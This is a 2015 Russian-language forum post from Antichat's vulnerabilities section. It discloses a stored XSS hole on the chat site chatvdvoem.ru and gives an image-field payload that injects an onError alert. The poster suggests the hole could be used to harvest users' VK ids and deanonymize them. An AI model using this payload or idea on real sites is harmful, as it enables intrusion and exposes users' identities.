ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Уязвимость чатвдвоём.ру (https://forum.antichat.xyz/showthread.php?t=8071419)

CKahn 18.08.2015 01:00
Уязвимость на chatvdvoem.ru
Type: XSS
Для эксплуатации отравляем сообщение:

source:

Код:
Image_msg: x
" onError="
alert
(
'xss'
)
"

В теории можно вставить скрипт для получения id вк и деанонить пользователей сайта

image

IMAGE http://pikbox.ru/img/12%2f20150818182950641chatvdvoem.png


Время: 19:08